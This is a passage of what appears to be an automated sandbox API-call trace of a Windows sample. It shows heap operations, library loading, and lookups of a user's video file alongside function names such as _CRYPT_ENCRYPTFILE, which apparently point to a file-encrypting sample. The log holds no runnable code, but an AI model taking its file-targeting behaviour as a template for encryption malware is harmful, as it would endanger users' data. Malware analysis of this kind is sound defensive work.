hHeap=0x8a0000) returned 1 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.225] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.225] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.225] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0199.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0199.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.226] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0199.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.226] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.226] CloseHandle (hObject=0x158) returned 1 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.226] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.227] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.227] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.227] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0199.227] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.228] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.228] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0199.228] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.228] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0199.228] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0199.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.228] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.228] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.228] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.228] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20431190, ftCreationTime.dwHighDateTime=0x1d5e066, ftLastAccessTime.dwLowDateTime=0x98709d60, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0x98709d60, ftLastWriteTime.dwHighDateTime=0x1d5dac4, nFileSizeHigh=0x0, nFileSizeLow=0xa550, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="c2l5D8zFcQaFr.mp4", cAlternateFileName="C2L5D8~1.MP4")) returned 0x90add8 [0199.228] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.229] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.229] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20431190, ftCreationTime.dwHighDateTime=0x1d5e066, ftLastAccessTime.dwLowDateTime=0x98709d60, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0x98709d60, ftLastWriteTime.dwHighDateTime=0x1d5dac4, nFileSizeHigh=0x0, nFileSizeLow=0xa550, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="c2l5D8zFcQaFr.mp4", cAlternateFileName="C2L5D8~1.MP4")) returned 0x90add8 [0199.229] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.229] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.229] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BpaZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="paZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.230] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZzgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TH\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zFcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FcQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cQaFr.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.231] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.231] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0199.231] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.231] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.231] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.231] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.231] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.231] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.232] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0199.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.232] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20431190, ftCreationTime.dwHighDateTime=0x1d5e066, ftLastAccessTime.dwLowDateTime=0x98709d60, ftLastAccessTime.dwHighDateTime=0x1d5dac4, ftLastWriteTime.dwLowDateTime=0x98709d60, ftLastWriteTime.dwHighDateTime=0x1d5dac4, nFileSizeHigh=0x0, nFileSizeLow=0xa550, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="c2l5D8zFcQaFr.mp4", cAlternateFileName="C2L5D8~1.MP4")) returned 0x90af58 [0199.232] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.232] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.232] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.232] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.232] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0199.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.232] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, 